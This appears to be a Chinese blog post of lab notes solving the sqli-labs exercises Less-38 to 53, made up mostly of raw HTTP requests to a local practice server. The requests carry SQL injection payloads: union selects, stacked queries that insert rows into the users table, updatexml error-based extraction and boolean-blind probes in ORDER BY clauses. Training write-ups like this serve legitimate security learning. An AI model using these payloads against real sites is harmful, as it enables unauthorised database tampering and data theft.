Less-38 stacked Query
GET /Less-38/?id=-1%27%20union%20select%201,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
这关的目的是堆叠注入多个sql语句
GET /Less-38/?id=-1';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('1234', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-39 stacked Query Intiger type
GET /Less-39/?id=-1;INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-39', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-40 stacked Query String type Blind
GET /Less-40/?id=1');INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-40', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-41 stacked Query Intiger type blind
GET /Less-41/?id=1;INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-41', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-42 - Stacked Query error based
- 源码中密码部分没有进行过滤,可以注入,然后利用报错发现注入点
POST /Less-42/login.php HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-42/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
login_user=&login_password=';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-42', '5678');--+&mysubmit=Login
Less-43 - Stacked Query
POST /Less-43/login.php HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-42/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
login_user=&login_password=');INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-43', '5678');--+&mysubmit=Login
Less-44 - Stacked Query blind
盲注,没有报错信息
POST /Less-44/login.php HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 134
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-44/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
login_user=Dumb&login_password=';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-44', '5678');--+&mysubmit=Login
Less-45 - Stacked Query Blind based twist
盲注,没有报错信息
POST /Less-45/login.php HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 135
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-44/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
login_user=Dumb&login_password=');INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-45', '5678');--+&mysubmit=Login
Less-46 ORDER BY-Error-Numeric
随便找个表,然后凑一个select语句然后产生报错,然后用sqlmap测试了这个注入点
GET /Less-46/?sort=(select count(*) from information_schema.INNODB_SYS_TABLES where updatexml(1,concat('^',(select database()),'^'),1)) HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-47 ORDER BY Clause-Error-Single quote
GET /Less-47/?sort=1' and (select count(*) from information_schema.INNODB_SYS_TABLES where updatexml(1,concat('^',(select database()),'^'),1))--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-48 ORDER BY Clause Blind based
根据之前的sqlmap给出的语句基于bool验证结果
GET /Less-48/?sort='1',(SELECT (CASE WHEN (length(database())=8) THEN 1 ELSE 9523*(SELECT 9523 FROM INFORMATION_SCHEMA.PLUGINS) END))--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-49 ORDER BY Clause Blind based
GET /Less-49/?sort=1',(SELECT (CASE WHEN (length(database())=8) THEN 1 ELSE 9523*(SELECT 9523 FROM INFORMATION_SCHEMA.PLUGINS) END))--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-50 ORDER BY Clause Blind based
GET /Less-50/?sort=1;INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-50', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-51 ORDER BY Clause Blind based
GET /Less-51/?sort=1';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-51', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-52 ORDER BY Clause Blind based
GET /Less-52/?sort=1;INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-52', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-53 ORDER BY Clause Blind based
GET /Less-53/?sort=1';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-53', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Alipay
Wechat
最后一次更新于2022-06-27 17:06
0 条评论